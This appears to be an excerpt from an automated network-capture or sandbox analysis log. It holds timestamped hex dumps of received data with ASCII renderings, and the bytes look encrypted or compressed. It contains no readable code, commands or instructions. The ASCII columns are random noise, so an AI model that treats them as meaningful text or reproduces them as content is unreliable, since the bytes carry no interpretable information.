5f 64 a0 10 0a f4 6f 39 08 d2 00 f2 9e 18 a2 dd c7 f9 c4 da e6 d8 ec 9a 6d 41 c2 f6 5f f9 de ed a4 9b f6 03 70 ce 1f 0f 72 fb f0 81 62 2a
                                                                                              Data Ascii: !,'9Q|@Hx+K9 %=`]WlRj(T';sK 8G4v2^8.318G[7Z ;8~c0Ed6s@KcC5fi2{x`$ce_do9mA_prb*
                                                                                              2021-12-13 23:57:17 UTC6220INData Raw: a3 7f 3b a3 80 88 7c af f8 58 be 06 95 69 67 c8 3c ed 5b 35 da a4 41 8b 48 4a 90 ac 6a 1f 43 19 0c 78 1c e9 4d a2 e0 06 f9 a5 c7 a4 39 9b e5 e9 96 da 96 2e 8d 7e f0 35 77 45 75 3d c2 a8 06 63 bb 21 c3 39 58 4d 7e b5 d3 b1 00 37 a9 8c a4 71 37 64 24 d6 43 9d 46 96 40 e3 54 7b 28 6f e5 fd e7 e3 b3 ce 39 49 e0 f6 5f 58 ec c9 18 7e cd ba 3b 4a b6 38 c5 e0 3a b3 d8 ab b4 9b 75 00 e4 0c d1 3d 59 65 62 dd 1e df 30 40 a7 a8 d0 99 2f 88 7d e6 b3 90 6e 09 de 3c 13 70 8e 9e 64 ac dd 11 b9 54 8e e3 e4 46 d0 c9 60 33 6a c8 39 04 96 47 dc c2 4f 77 7f 0a 26 f6 d2 90 f3 ab 34 c6 82 9c 77 cb 81 9b 9a 4c 2a 6c 04 bc d4 49 31 db 15 0f 3e 8f 6e a6 08 c6 39 8f 99 43 e7 17 e4 4b af 0e 54 40 77 56 9c 16 39 71 ca 41 76 09 da bd 69 3b bb 56 74 46 72 2e ac cd 72 ec 78 3f b8 2b 65
                                                                                              Data Ascii: ;|Xig<[5AHJjCxM9.~5wEu=c!9XM~7q7d$CF@T{(o9I_X~;J8:u=Yeb0@/}n<pdTF`3j9GOw&4wL*lI1>n9CKT@wV9qAvi;VtFr.rx?+e
                                                                                              2021-12-13 23:57:17 UTC6221INData Raw: a3 85 27 7d e8 f7 35 42 08 b5 e8 f4 ef 63 ad 04 85 99 e1 57 2c 5d 0f 09 2a 33 43 19 3d 64 7d 69 08 16 07 6d e1 e2 1c 86 45 84 28 f4 52 6b da 24 d8 a5 97 47 65 94 3d ff c5 99 cd 2a eb 58 7b 07 95 ad 20 c0 39 ae 69 3c 84 a3 bc 98 2b fc 5c eb 44 36 b1 c2 fd 73 05 51 1a 75 59 80 5e ab 24 88 bb 8c 81 23 88 de a6 d4 13 7b 41 84 a8 ab 68 3a b0 a1 ef aa 0d ad a6 cb d7 24 a9 b8 54 98 b6 b7 e1 2a 63 14 e4 e1 55 99 be 70 17 12 49 8a 30 33 1c 42 50 53 34 3a 1b 4f 5c ae 15 3a 93 8c 5d 27 3f 84 b0 cb ce 81 83 bd c1 a9 36 96 95 79 7c c6 5b fb 68 f7 13 bb 37 cc e6 82 62 38 f6 98 76 2a 74 58 dd 01 39 55 4a b7 18 7c ff af 0d b4 6c 9c 6f b0 ab b9 23 18 28 4c 3f 56 eb 33 ee 05 52 d9 db 32 43 e8 56 79 5c b1 43 6e f8 9a f8 6e 93 1f f2 69 4d df c1 3f a4 4e 27 ad 3a 98 e5 73 f0
                                                                                              Data Ascii: '}5BcW,]*3C=d}imE(Rk$Ge=*X{ 9i<+\D6sQuY^$#{Ah:$T*cUpI03BPS4:O\:]'?6y|[h7b8v*tX9UJ|lo#(L?V3R2CVy\CnniM?N':s
                                                                                              2021-12-13 23:57:17 UTC6237INData Raw: c0 a4 c3 d1 36 ae 81 41 e3 4a 69 b9 63 02 dc f2 af fa 7a 7a 74 9c fa 62 9c ec 15 49 21 fa aa ce 80 1a 9a cd 37 d1 9f ac 14 12 99 07 a0 15 f6 0d fc 0b 84 f2 71 14 c4 19 3f b3 ab 44 26 3d ee 35 9f fa 29 93 51 e0 1a a5 1a 9f b5 78 06 fa 0a a1 55 23 d0 14 44 82 17 aa b3 33 9e ca c0 31 46 bf a4 a4 c5 8c 3a 72 0d 54 aa dc a2 25 05 cf 28 c1 72 58 d2 70 a3 31 3e 96 a1 b4 83 90 a4 29 a4 c5 06 1a 47 48 40 08 5e c4 81 3b ad b4 cf e9 8b 04 ee b2 98 7d c2 79 d7 0d d7 71 a2 bb 68 80 b1 88 7f a4 8d 65 d1 f1 38 21 32 ec c3 d0 a7 fd fe 55 1c 02 22 3d f3 82 51 41 67 cc 6f 81 c6 4c 43 d4 07 58 16 cd 3d 29 9b ba 21 ad be c8 ca 24 f5 da 43 82 c7 7e de 6b f2 5f 40 a7 5a 62 2f 02 59 cb 6f d2 d2 cc dc 44 7e bc 11 61 c5 5f 6e f3 00 7c db e9 c2 f4 f4 83 f8 c1 8f 28 25 41 58 30 02
                                                                                              Data Ascii: 6AJiczztbI!7q?D&=5)QxU#D31F:rT%(rXp1>)GH@^;}yqhe8!2U"=QAgoLCX=)!$C~k_@Zb/YoD~a_n|(%AX0
                                                                                              2021-12-13 23:57:17 UTC6238INData Raw: 65 0c 32 e3 90 45 0e f5 78 a9 b2 4f f0 fd e1 c0 21 3a 88 1c ab dd a4 7c c7 44 70 57 e3 9d 2a 8d bf ec a9 c1 be 68 7b c6 3f 8a 09 9e 58 4b ef ad 4f 74 b6 95 35 cb ce 73 cc f5 1a b7 b3 89 f8 99 85 39 f5 1e 0e b0 cc e9 fe 0a 36 c1 1f ef 52 99 02 c9 93 c5 aa 2b 1a 46 ac 82 93 c5 1a 28 b6 00 db dc 80 cb a2 d0 9b 13 48 7a 8d 51 97 fc 0a 81 f5 7f 8b 45 81 07 b7 39 ab bc f8 41 3e cd 40 3a 0e 31 24 f6 52 06 44 28 7e f2 50 e6 ad d0 e9 bc 03 f4 33 7e c4 59 10 f9 31 4d 6a 55 1b c2 33 f8 29 03 57 a4 b3 22 12 e5 38 06 42 16 50 b4 1e 57 c7 1f d6 cb 91 db 6e cc f4 84 2b 69 d4 7a 18 2d 3d cf ae f2 83 d4 c1 5f 60 a5 eb 4c 95 14 2d 41 18 72 90 92 ff 33 fc fb 24 49 6c e5 dc 50 9e 33 54 12 9b 33 05 86 2f de 15 43 ab f2 cf 58 a0 20 83 24 35 dc be 2d 2a c3 a8 ad 64 28 f8 09 7f
                                                                                              Data Ascii: e2ExO!:|DpW*h{?XKOt5s96R+F(HzQE9A>@:1$RD(~P3~Y1MjU3)W"8BPWn+iz-=_`L-Ar3$IlP3T3/CX $5-*d(
                                                                                              2021-12-13 23:57:17 UTC6254INData Raw: e8 d1 5c 33 d3 9e dc 16 ae 7a ac ce 18 3c 30 b0 af ac 4f 7b ba 88 ff 3f e5 54 43 14 94 c4 68 65 a1 a7 c7 ea e9 a0 35 b6 f5 c5 27 0d 26 c5 7c c6 9f cb 2d ef 87 98 b5 6a cf e1 78 b7 f6 fc 8c d9 92 b5 a4 14 d5 6e e8 b3 72 33 6c 23 6a 29 ae 6a cd d3 6e de a1 ef 5a 27 c5 e6 c3 e9 44 07 69 5e 88 b3 44 00 58 34 95 b1 f8 d7 7c a1 be a2 98 28 ab 4a b7 41 b8 c7 5b 5f e2 42 fa 6d d9 3d 81 c5 de 80 b3 c1 9f 78 14 1b 36 a1 d2 b4 7a bc 38 ec 82 c3 8e 8d 7f ce 10 26 ff 34 96 65 bc f6 67 cf 14 2f fb a6 f5 45 98 f6 8d 2d c0 5e 5f f6 02 46 30 ba d8 21 27 cb 0b 84 83 e7 32 9a 88 2b f2 13 58 4d cd 8b 2f 1c 6e 06 ae 56 c1 6e 86 f8 de a1 3d 91 da 2b 68 f8 31 5b 48 a0 df 14 66 ac 8d 91 b2 fd 9f 4f 57 4d 11 b7 4b 2b 96 78 07 7e 7e 4d b9 c7 aa f3 dd 7c 7f 20 84 79 c0 8f ef 8c 1f
                                                                                              Data Ascii: \3z<0O{?TChe5'&|-jxnr3l#j)jnZ'Di^DX4|(JA[_Bm=x6z8&4eg/E-^_F0!'2+XM/nVn=+h1[HfOWMK+x~~M| y
                                                                                              2021-12-13 23:57:17 UTC6255INData Raw: b7 89 df 43 15 da 22 05 96 ed 07 1d 23 fa 5e ba f4 1c e0 d8 04 0b 99 86 c6 0a b1 9c 66 d9 f6 f2 6b ed 7d e9 a3 95 9e 25 a5 d4 4c bb f9 11 19 5d 30 e5 e8 19 ae 74 89 b5 75 4b ae 7e e5 b3 a9 bf f2 5e f1 8d 14 6a c1 f5 49 20 5f bf cb 46 96 5e 63 96 53 81 1d 69 5c 60 a9 1e aa 2e 29 84 d4 5e 50 c7 d8 16 dc 69 d4 d1 e3 97 b5 f9 e4 c5 c2 be fc a9 8b 48 40 4f 91 ff d7 b0 3f e0 9d 65 1d 15 87 e6 80 99 b8 17 cf d6 30 5c 4f 74 5c 85 59 75 36 e9 6a 4b a8 59 91 b9 b6 18 98 03 a9 53 3f a0 bb 14 09 6c 94 d9 ce 5b 51 2c 19 79 76 87 50 99 37 29 89 6e 15 56 11 37 09 d8 d6 6d ae 55 46 d7 41 a4 f5 e5 7b 42 53 bf 64 3c 01 b9 e5 2e e5 c5 1c 6e 14 16 68 d2 71 e6 ae 0b 15 ca 8d 65 c1 3b 0f e4 53 25 58 42 b4 34 c5 8a 43 0b 55 3c b6 1b 51 bc a9 cf 4a cc 4c 4f 9e 9f 62 13 33 fc 78
                                                                                              Data Ascii: C"#^fk}%L]0tuK~^jI _F^cSi\`.)^PiH@O?e0\Ot\Yu6jKYS?l[Q,yvP7)nV7mUFA{BSd<.nhqe;S%XB4CU<QJLOb3x
                                                                                              2021-12-13 23:57:17 UTC6271INData Raw: 82 95 b3 e7 6d 1a 91 27 32 b5 9d a0 e5 d1 59 fb 82 fe b4 af 94 1b 6a 33 7f f5 be 6e 0d 0c 92 1a a6 41 b4 c7 0d 10 11 ed 61 ca 25 25 ef 10 09 cd 49 34 6c 6c 93 76 5c 13 2c 35 37 23 06 56 01 7a 2d 3f 75 db b4 c6 6c 5c de eb e7 b9 ec 30 2d 35 99 57 21 25 0e 46 02 f6 a0 d4 c1 fb 3f 49 87 0d 07 f2 48 93 c3 86 e2 2c 59 16 96 69 0d 4f 24 dc 0a 5a ce b6 4c c3 2a 7d 12 e2 b6 3b 91 63 68 a2 a0 4b 48 72 cd 4d b1 d0 15 de 15 81 f6 6c 19 fe b4 10 08 02 53 ef 55 f5 87 b2 95 77 a0 45 34 74 cc 06 c0 25 15 49 33 23 a3 ae 3a 76 c3 b8 1c 2e fa 2b a2 1d 76 96 e1 04 75 bc 67 30 39 23 92 29 0d 05 b8 3d 3a 91 8e 8b f4 d2 2c 87 f1 10 9b ca db 8d 13 e3 8e 7a cc af 80 37 41 7a 12 55 63 98 56 eb c1 2d 7f 4e bd 37 56 32 20 78 ca f3 6f e3 fb 0c d3 6e 06 ab 4d 0e 23 fe f8 d8 eb 3a 55
                                                                                              Data Ascii: m'2Yj3nAa%%I4llv\,57#Vz-?ul\0-5W!%F?IH,YiO$ZL*};chKHrMlSUwE4t%I3#:v.+vug09#)=:,z7AzUcV-N7V2 xonM#:U
                                                                                              2021-12-13 23:57:17 UTC6272INData Raw: 9f 6c 04 f6 7b cc bb 7c aa 29 8a 3a 27 a1 e9 b3 3a 2a 29 d1 9b ae 94 ae 84 2e 5f 5f b1 0b 58 b6 89 fd 14 a7 f9 cb f7 a9 eb 9b 7b e8 51 d8 ec b4 d4 78 01 0c a9 30 ac 54 ee 58 f5 bf 4b 1b d7 55 2a 64 1d c2 d2 11 45 23 44 a5 ef cf 1a 0f 3f db e3 eb 1c a7 fa bd 8d db 65 fe c9 1c bb 56 4d 36 ad 03 6f 97 ac 8b 3b 26 9f 86 92 b9 95 7c bc a9 88 c8 c4 14 f2 61 5a 62 da 45 96 d2 d0 8f 3e c8 af 54 83 3b 71 55 2d 56 e1 4b 4d 85 b3 85 30 86 1b 37 5a 58 b8 bd 39 d6 ab 5b b2 7a 90 06 47 3e 62 80 a3 ec 0e 58 e8 e2 16 93 47 a0 1e 73 3a 75 e3 5b 88 12 b0 15 48 7a 03 73 d6 36 b3 71 44 f7 25 aa ba a3 37 6b b2 2d e0 a8 e5 d6 b3 bb 7c 8e 20 10 d8 c2 d8 d0 82 99 91 74 9a 38 90 a2 61 1b 39 c1 d6 a2 e1 fb 69 37 06 e0 3d 48 e7 2f 73 bf 76 1f ad 61 21 d4 38 f0 92 23 3d 11 65 85 66
                                                                                              Data Ascii: l{|):':*).__X{Qx0TXKU*dE#D?eVM6o;&|aZbE>T;qU-VKM07ZX9[zG>bXGs:u[Hzs6qD%7k-| t8a9i7=H/sva!8#=ef
                                                                                              2021-12-13 23:57:17 UTC6288INData Raw: d4 53 59 07 2a df 26 f8 d7 45 04 6b 89 3e aa 85 e1 7a 8f 7d 3e 0e a6 a3 55 cd 74 d5 7f a1 ca 21 fc 84 40 b3 a1 cb 18 23 23 75 09 2b 4b 93 27 d1 81 75 75 10 71 92 11 f7 93 9e c6 4d 10 36 f2 28 da 91 cc a1 2c 94 a0 7d 8c 8e 71 c2 7c 9c 80 39 ea 10 51 b1 bc ec 90 2f c6 aa 2a bd 50 24 6f a6 11 0c d1 a6 3a 31 aa 5e 59 a3 a1 8f 70 00 11 90 be 41 7a 79 11 1f 56 78 00 06 71 4a 02 1a c5 18 fa b3 28 d8 e9 48 3a 7b bb b2 6b f2 49 d6 e5 cf 94 24 3e 2f 88 e5 e7 16 ea b3 b7 d7 f8 80 3b de af db c6 83 77 19 67 6a 42 81 bd fa ba f8 fa 81 20 14 1a d1 ad d0 4f 08 3d ee 47 59 79 56 81 4a 1e c9 b2 94 9b c3 ce 2f 4a 2b 53 b0 4a 7f c1 88 56 c1 2c bb 66 88 04 7f dd 55 b3 58 a0 d2 ff 1d 27 89 12 c6 8c cd ea 08 e4 c5 fe f8 a0 49 4e 5f 38 20 20 21 74 44 1d c8 c2 93 4e 78 74 09 0b
                                                                                              Data Ascii: SY*&Ek>z}>Ut!@##u+K'uuqM6(,}q|9Q/*P$o:1^YpAzyVxqJ(H:{kI$>/;wgjB O=GYyVJ/J+SJV,fUX'IN_8 !tDNxt
                                                                                              2021-12-13 23:57:17 UTC6289INData Raw: 09 c2 6c 92 c1 8f 1b a7 06 1f 5d 41 90 67 68 e9 8d 38 20 0e 5b 6c b4 63 15 9b 2e fe 8e 00 80 35 08 a8 39 9b 78 40 6b 87 f8 a2 cd 92 8a 22 eb 2c 36 40 9b 32 a8 17 81 80 2e 09 a9 4a 2c 80 1c 06 42 e8 ba cf 48 25 75 00 11 95 a7 76 4d fd 9e 82 35 3c 58 f8 a8 8e 9e 2f 29 d5 2b 6d b6 89 04 51 e8 ca cd f4 fd db e4 78 a4 c4 5e a8 76 26 6e c4 06 4f 37 a3 42 9f f3 17 79 c3 13 e3 38 0d b3 48 9b d4 2c 5c 2d e3 1d 9f e0 d4 dc 5e e3 d5 39 37 80 c2 f9 41 3c 34 de ac 3b fc e6 90 d8 58 2d 8e e9 d4 2d 77 e8 2c 17 8f 32 a7 54 da 30 5d 47 46 10 16 8c 7e 26 e5 c9 38 28 32 02 60 55 2c 47 18 81 8f 18 74 0f b6 ce 9f 04 b5 56 a8 74 a8 c4 c4 70 28 5d 65 0a c3 9d bc e2 8b ff 34 a9 ad 28 40 37 00 ff 66 b4 c0 f8 ec 9a 73 35 26 b8 06 dc 86 de cd 08 c2 9a 5c dd 1c 46 8d d5 7b e2 c6 a5
                                                                                              Data Ascii: l]Agh8 [lc.59x@k",6@2.J,BH%uvM5<X/)+mQx^v&nO7By8H,\-^97A<4;X--w,2T0]GF~&8(2`U,GtVtp(]e4(@7fs5&\F{
                                                                                              2021-12-13 23:57:17 UTC6305INData Raw: 1c e2 3b 1a da 22 82 8e 9d db f5 8a d9 03 d8 14 8f 1e 3a 9c db 21 fa 3e 70 f3 fa a7 29 bd 7b cf 3d 0e 49 57 62 7e 88 7f 13 b9 f6 1c 59 fd 0e 3a 14 28 a4 80 3b 75 31 eb f9 f2 3e a3 46 56 ce 77 d9 08 fd f3 2d b3 5c 4c fc fc 49 6e bf 60 0a 20 d6 26 47 0a 8a 7f 2b 51 aa 81 9e a0 b4 7a 12 b5 48 7f 5f 3a 78 43 4b af 51 4a 01 26 57 bf e5 67 1e ca 12 26 a6 7c 6a 82 28 8c 37 f7 7e 53 7b f2 e4 73 23 a1 61 ce 80 94 eb 1e 03 d7 cf 3f 10 8f c2 3e 5d b1 39 2e 63 2a 08 fd 2d 1f d2 a9 8e 45 cf 28 9d 15 84 90 59 a4 1b 60 e5 7a 6f 95 6c 09 d6 bb 0a e7 f9 d4 55 27 ee 4b d7 7c 26 d1 21 98 43 30 f9 76 aa 19 28 ca ce da b2 81 0e 24 62 be b4 3c 86 98 c3 76 57 b9 ae ad 1e 64 41 d7 de 76 ea 67 4f df 01 b0 0a 3a f3 6c c4 e9 2f 5b 58 87 cc 55 b1 d9 1a ef 9e 5b c7 e6 7d f5 4b 25 c5
                                                                                              Data Ascii: ;":!>p){=IWb~Y:(;u1>FVw-\LIn` &G+QzH_:xCKQJ&Wg&|j(7~S{s#a?>]9.c*-E(Y`zolU'K|&!C0v($b<vWdAvgO:l/[XU[}K%
                                                                                              2021-12-13 23:57:17 UTC6306INData Raw: 81 28 e7 6d cc f7 a1 1c 69 28 a0 70 25 6f fb c9 d8 fc ec 64 bb 86 1d 5e bc c4 1a 94 ae 8e 1b 18 c3 b2 c7 55 ad b3 0f 5d fc d0 4b 76 00 d7 ca a6 a5 fe 5a ea e0 d5 55 1e ff 65 1b 95 29 9e db b0 53 13 8a 99 17 f3 65 4d 6a f2 bc 29 fb 2a a0 52 cf 92 1d 0c 75 7d b6 99 62 4e 84 8b 31 a2 b9 8f 6c cb b4 c2 a4 67 21 43 55 57 60 f0 22 bf 03 29 2d ad f1 4f b1 21 18 9e ec 92 29 6a 0e 97 fb 3a 54 22 7a 9d 5e 8c 1a f5 95 4d a5 4a 11 8a 4a a3 2c 69 1f 75 85 00 18 7a b1 31 4f 9b 6a 41 b3 b7 67 bf ac 97 9a b5 b3 f3 79 74 31 c1 a8 65 9a 6f f6 37 7f 4e cd 06 4f 0d 29 26 1b ed 33 4f ee 8d eb 32 cf 36 ad d5 65 c0 ed 0d 9b 75 b6 57 bb 81 dd 3c 5b 72 a1 9f 88 a9 05 f7 33 6e 56 dd b8 fb a0 47 9e 9b 4d 89 fa 37 4e 08 00 23 bc db d3 82 35 d6 13 d5 9c d8 e4 4c 2a e9 b8 8b a1 eb 76
                                                                                              Data Ascii: (mi(p%od^U]KvZUe)SeMj)*Ru}bN1lg!CUW`")-O!)j:T"z^MJJ,iuz1OjAgyt1eo7NO)&3O26euW<[r3nVGM7N#5L*v
                                                                                              2021-12-13 23:57:17 UTC6322INData Raw: ff 6b 57 d9 ed 89 4d cf fa 06 60 74 8f b8 af 0a 54 75 96 31 89 0b 29 84 ca d9 7c fe b2 23 8e a7 86 6e 96 a2 04 65 71 09 b3 35 39 2d a1 16 24 8a f4 73 c5 aa 17 e3 0f 16 f1 8d 87 21 e4 37 6e 9b d5 30 05 c4 ab fc d7 b4 58 7b cb 08 bc 12 f3 c0 c5 ab 30 d2 18 53 2b 73 8f 42 ba 66 da 26 f1 bc 72 04 0e 55 b8 e8 cd 45 fc ba 20 a2 56 ef e9 cc 56 e8 01 b2 58 ea 1e a2 18 0c a5 37 e1 0e 41 a6 6e f4 3d 60 d2 40 34 ad 4d 0f 3c 91 5b 44 5c a9 dd 31 7a 8c 20 12 be 2a c5 1e fb 1a 12 f7 08 f4 7e 32 9c 3d 24 62 f7 4d f8 d5 22 d1 c3 3f 91 28 4b 32 49 d1 11 ef 64 95 aa 55 e2 42 94 94 fb 15 78 8e 3c 5c 98 9b 67 2d 2a ab 21 64 f0 dd 10 56 a8 2d 7e eb 60 48 b9 43 77 77 8b 8b d8 bd 6d d5 e2 49 ab 21 92 b5 8b 39 7b c6 c8 69 ef ec 4d 28 d1 32 84 0b 65 56 39 a3 2a c1 e5 c6 b6 83 8d
                                                                                              Data Ascii: kWM`tTu1)|#neq59-$s!7n0X{0S+sBf&rUE VVX7An=`@4M<[D\1z *~2=$bM"?(K2IdUBx<\g-*!dV-~`HCwwmI!9{iM(2eV9*
                                                                                              2021-12-13 23:57:17 UTC6323INData Raw: 44 d7 18 b4 e3 4b 2d 7e 49 70 f5 b7 35 a8 8e 75 9a e8 d2 c8 52 ea 2b 7d d7 a2 92 ce 2d 11 56 0a a5 08 e9 6b 87 09 66 fd e0 e7 5a d6 37 20 5a 31 cd d7 b0 f6 c8 cf d1 c2 f9 82 3f b1 2d 8f 01 18 64 70 79 ae ef e7 46 4e 77 34 54 da 74 5c e1 6d 2a b7 82 c5 5a 53 e6 2b 18 af d9 4b b4 07 02 55 f4 16 de 7f e6 60 69 8a 2f 22 13 e8 52 fe cc e7 32 81 c1 6e 86 65 cd 7b bc bc 06 95 a2 30 85 d5 a0 95 a4 cc bc d3 d2 b2 48 17 84 ea be 73 3b 0a c9 72 eb 07 35 3e f2 db fb 22 06 84 a8 1a d7 4b ce db f9 6b 4d 97 41 3f af c4 03 e6 38 f2 0d 72 d4 99 e4 86 df 79 33 5e d5 ae 8d 70 84 8a fc 1f a8 a5 78 c9 9e 34 3f 70 d9 47 2d 7d a8 b9 2a 28 ee 20 60 ca 42 3f ce 3a cc 98 98 ae a8 e0 58 5e 5b 55 4a 56 88 a7 86 dd cc 98 b7 6d 15 96 ba 6f 31 7a da 7e 6e a2 a7 ec 12 e9 13 19 78 7b 01
                                                                                              Data Ascii: DK-~Ip5uR+}-VkfZ7 Z1?-dpyFNw4Tt\m*ZS+KU`i/"R2ne{0Hs;r5>"KkMA?8ry3^px4?pG-}*( `B?:X^[UJVmo1z~nx{
                                                                                              2021-12-13 23:57:17 UTC6339INData Raw: 21 85 75 4a 5a d5 92 20 ef b0 67 f8 ae 9d c7 33 08 c2 6a 6f 5e b7 fb 2e 21 96 a0 56 e0 b5 c4 f6 8e 77 d1 d2 11 95 5c 07 0f 61 e6 c5 42 4e f3 75 38 b0 01 f9 58 dd 2d c8 17 99 2b 59 ab 98 9b 79 d6 01 fd ea 29 ce 8d 6d cf 46 86 8e ce 31 4c bf 41 8a 9e 03 8b 00 c9 97 ab 65 a0 69 1a c4 67 0c 94 d1 f4 4a aa 4e 5d 3f 26 49 db 9a 7a 09 e3 d9 10 69 14 8a e5 cc 2b 53 bd 6b bc 26 9d 58 0a eb fb 5a a8 d8 ea b0 5b 7e ce a6 49 c9 fb 0d 53 1b 68 bf 10 eb f2 41 23 28 46 69 61 8c 2e 7d db 09 a2 85 17 ef 3e 36 e3 38 2f f6 2d 5a 15 2a 77 c7 93 a3 38 90 5e d0 28 07 43 d6 53 84 71 f7 cf 02 14 14 3a 45 89 6e 94 1b a2 a8 66 6f 08 6d 4c 08 a5 16 68 4e 7b 61 c8 30 a6 bf 51 ef 69 29 b6 97 86 b7 e9 90 f5 77 0b 7d 6c 10 d4 04 bf 60 99 43 15 32 a7 d5 a4 5b 36 ad 8f ea 35 78 e6 ee 63
                                                                                              Data Ascii: !uJZ g3jo^.!Vw\aBNu8X-+Yy)mF1LAeigJN]?&Izi+Sk&XZ[~IShA#(Fia.}>68/-Z*w8^(CSq:EnfomLhN{a0Qi)w}l`C2[65xc
                                                                                              2021-12-13 23:57:17 UTC6340INData Raw: a3 d3 d2 1a f3 05 42 3c 22 05 8b 2a 55 bf fb 57 75 af 81 4a 0c 26 8e 53 7d 1c ba d2 2f 7e c0 36 c9 e7 6c 95 a3 d2 45 d1 23 02 e8 6d c3 85 c4 2e 0a 8d 97 3d 56 cd 67 81 16 bd 55 4d 18 04 08 14 97 a8 74 7e be 0e 19 ef 8f a7 e1 91 bc 4a e6 83 11 f5 2d dc b4 85 02 6d a4 d5 cf 6e c0 b8 35 1c dc 44 7b 03 ac 22 3e 97 72 6a b5 b1 b8 1e 25 dc 85 32 38 d1 1d 21 65 9b a8 6b 97 4f f6 d8 56 c7 7a 84 cb d6 97 a9 56 ea f3 b2 bf 6a 0d c5 5d 77 70 b7 dc f6 ae 01 94 e7 9f 47 67 1c 3d f5 0a 5e e8 51 ee 39 8a 8f 24 37 48 8b 2c d7 7a 4a 76 65 54 5f da d4 d1 4e ac 47 66 e8 ba 05 4b 9f aa b7 c3 d4 ff 0a db 3d 0e b9 49 11 60 40 d1 a5 cd 03 94 f5 16 9e ef 1a cf 18 29 ed 78 27 01 a2 1f d9 de 5a 76 7f 1d 5a 90 4e 0c 1c 99 c0 13 5e d4 be c5 9f 9e aa 43 ab 3a ef 66 41 f2 5c 89 06 22
                                                                                              Data Ascii: B<"*UWuJ&S}/~6lE#m.=VgUMt~J-mn5D{">rj%28!ekOVzVj]wpGg=^Q9$7H,zJveT_NGfK=I`@)x'ZvZN^C:fA\"
                                                                                              2021-12-13 23:57:17 UTC6356INData Raw: eb 65 dc 35 e6 1d 0d a9 2f 24 21 77 1c df 8a 11 0b 18 47 a1 ec 9d 91 4d 87 b0 49 86 d7 24 cf 37 eb 96 d8 ea 17 53 09 73 dc ce 16 c9 1d 26 9e a2 84 1b 10 5b 2d 8f e7 f2 79 43 21 3b 3e 33 27 42 e2 22 d8 b1 90 87 4b 07 d2 56 7b c0 35 b0 0d 1c 57 56 c0 77 c4 9f ab ec e0 5e b3 c7 8f 3b 4a 89 f8 9f 0a a3 08 bc 1a c4 76 93 ba b5 4f fa eb b2 51 54 7b 1d e5 59 91 01 fb c5 14 7a 62 fa 25 e7 36 f6 cd 87 53 4b 90 46 8d a2 80 78 ca 36 1d 3d 2f 85 d7 05 5c 48 9d b0 59 00 cc d4 c3 11 4c 0f 5b ab cf 7c 92 84 dd d1 d9 a8 66 4b 81 65 a8 ec ae f5 72 26 cc 43 cf be 30 b8 de a3 5e ae e5 ac 48 ac 12 f4 ad 2a f4 cb d0 c2 ec b0 1e 0d 1d 44 d1 97 3e a4 75 8c b6 18 9d f6 55 cb 27 9e 9b 91 0f 0b f3 47 07 45 05 49 42 20 62 e9 34 d5 cb b6 d2 73 b6 71 ac fd dc 36 a3 06 8d 19 fc 22 bb
                                                                                              Data Ascii: e5/$!wGMI$7Ss&[-yC!;>3'B"KV{5WVw^;JvOQT{Yzb%6SKFx6=/\HYL[|fKer&C0^H*D>uU'GEIB b4sq6"
                                                                                              2021-12-13 23:57:17 UTC6357INData Raw: 8a 03 3a ae 68 92 c3 cc 77 53 54 53 b9 84 9c 5f 8b 44 8d e9 5d b4 23 6a b5 64 12 b7 a9 8f 89 bd bf b2 0f 91 31 56 51 0f d4 78 83 ac 3a f2 7b 12 fd da 6f 69 88 1f f8 e4 df 76 cf c5 10 ee ed 32 e5 89 38 f5 26 87 16 d3 95 61 19 7b 93 41 10 63 2e e0 a6 e6 3b 6c be dc cf af b4 74 90 dd d8 c4 91 54 76 67 40 21 92 4d f3 99 d0 11 1a d2 b9 ee c4 a6 24 46 5b 9e c1 eb 46 3f c3 00 05 5b 6c ca ca 05 f6 d7 12 a5 54 d1 b9 76 00 ca b8 80 83 a0 6d cc 15 f6 27 f3 0f 5a 4b d3 0e 3a 96 c1 2a 0c 37 a0 f7 4f e9 31 af ff 6a b0 04 dc 68 e3 33 46 a2 f9 d4 50 7c 37 e5 6d fe 52 dc f3 18 96 72 2b 29 95 cb c8 6b 42 aa bc bf b4 e9 e7 df 5e c5 69 38 f1 6b fc 41 6c fd 65 de 64 71 1b 5c d5 c8 7a 17 1c 54 01 2f f1 fc e8 f4 53 c5 2b 25 a0 90 8f 81 31 0b 22 70 73 08 1c a9 f7 cb 5e 6d c8 f1
                                                                                              Data Ascii: :hwSTS_D]#jd1VQx:{oiv28&a{Ac.;ltTvg@!M$F[F?[lTvm'ZK:*7O1jh3FP|7mRr+)kB^i8kAledq\zT/S+%1"ps^m
                                                                                              2021-12-13 23:57:17 UTC6373INData Raw: 10 e5 70 dd 80 70 a0 c8 9d ed 7a 88 e8 74 ad 3d 30 b2 19 b9 fe 6b d0 1d 5c 8b 92 9c 8a 55 dd 7e 1e ad e7 38 c4 91 30 c3 69 bb de 9d 6a 40 fd 83 5a e8 7a 5a 60 57 21 28 47 9f a4 2a ee 75 de 14 f6 2d 3c 06 0e bc 1c ad fe 2d f2 3d 14 a2 cd 86 82 cb ed 6f 9d ee 4e 3b c4 46 a6 b3 71 b6 0a 8b e2 21 d2 4c 6d 65 6f 5e 23 b5 69 e2 2d 36 81 66 11 73 50 ce af 01 7c ee 66 ef 6a 06 13 fb aa 96 d1 99 32 b4 b5 f9 af 70 88 9d 2e 48 a9 74 dc 2f 49 aa fa 1d 06 a6 a8 a3 52 4c b9 ef 89 17 94 0c 41 f3 58 7f 5e d3 53 67 3d 76 42 40 7b f3 3e f9 4c ba f8 72 b9 04 21 9a 76 38 91 d6 44 e8 8d b0 ea 02 ba 9b c1 7b d0 54 44 0b f5 75 28 11 d8 e2 86 63 a4 27 f6 57 b0 4a 2c 20 ad 2d 4a 10 36 0e 4d 95 5c e0 87 56 8f c5 41 a7 e4 d2 a8 1c 56 19 89 61 e1 9c a2 3e 66 3a 05 41 78 1c c5 c3 c4
                                                                                              Data Ascii: ppzt=0k\U~80ij@ZzZ`W!(G*u-<-=oN;Fq!Lmeo^#i-6fsP|fj2p.Ht/IRLAX^Sg=vB@{>Lr!v8D{TDu(c'WJ, -J6M\VAVa>f:Ax
